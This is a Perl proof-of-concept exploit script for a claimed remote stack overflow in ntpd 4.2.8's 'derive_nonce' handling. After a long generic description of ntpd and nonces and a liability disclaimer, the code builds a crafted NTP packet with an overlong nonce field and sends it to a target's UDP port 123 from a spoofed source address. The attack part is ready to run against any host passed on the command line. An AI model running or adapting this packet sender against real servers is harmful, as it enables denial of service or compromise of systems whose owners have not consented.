#!/usr/bin/perl
#
#  Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC
#
#  Copyright 2016 (c) Todor Donev
#  todor.donev@gmail.com
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
# 
#  Description:
#  The ntpd program is an operating-system daemon that sets and maintains 
#  a computer system's system time in synchronization with Internet-standard 
#  time servers. It is a complete implementation of the Network Time Protocol 
#  (NTP) version 4, but retains compatibility with versions 1, 2, and 3.
#  ntpd uses a single configuration-file to run the daemon in server and/or 
#  client modes. The configuration file, usually named ntp.conf, is located 
#  in the /etc directory. Other important files include the drift file, which 
#  ntpd uses to correct for hardware-clock skew in the absence of a connection 
#  to a more accurate upstream time-server.
#
#  Nonce is an arbitrary number that may only be used once. It is similar in 
#  spirit to a nonce word, hence the name. It is often a random or pseudo-random 
#  number issued in an authentication protocol to ensure that old communications 
#  cannot be reused in replay attacks. They can also be useful as initialization
#  vectors and in cryptographic hash function. A nonce is an arbitrary number used
#  only once in a cryptographic communication, in the spirit of a nonce word. 
#  They are often random or pseudo-random numbers. Many nonces also include a 
#  timestamp to ensure exact timeliness, though this requires clock synchronization 
#  between organizations. The addition of a client nonce ("cnonce") helps to improve 
#  the security in some ways as implemented in digest access authentication. To ensure 
#  that a nonce is used only once, it should be time-variant (including a suitably
#  fine-grained timestamp in its value), or generated with enough random bits to ensure
#  a probabilistically insignificant chance of repeating a previously generated value.
#  Some authors define pseudo-randomness (or unpredictability) as a requirement for a
#  nonce.
#
#  Disclaimer:
#  This or previous program is for Educational purpose ONLY. Do not 
#  use it without permission. The usual disclaimer applies, especially 
#  the fact that Todor Donev is not liable for any damages caused by 
#  direct or indirect use of the information or functionality provided 
#  by these programs. The author or any Internet provider bears NO 
#  responsibility for content or misuse of these programs or any 
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.) 
#  caused by the use of these programs is not Todor Donev's 
#  responsibility.
#
#  Use at your own risk and educational purpose ONLY!
#
#  Thanks to Maya Hristova and all my friends that support me.
#
#  Suggestions,comments and job offers are welcome!
#
#
  
use Net::RawIP;

print "[ Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC\n";
print "[ ======\n";
print "[ Usg: $0 <target>\n";
print "[ Example: perl $0 133.71.33.7\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";
my $target         = $ARGV[0];
my $data           =  "\x26\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x6e\x6f\x6e\x63\x65\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
my $sock           =  new Net::RawIP({ udp => {} }) or die;
                          $sock->set({  ip =>    { saddr => "192.168.1.1", daddr => $target},
                                       udp =>    { source, => 31337,  dest => 123 , data => $data}});
                          $sock->send;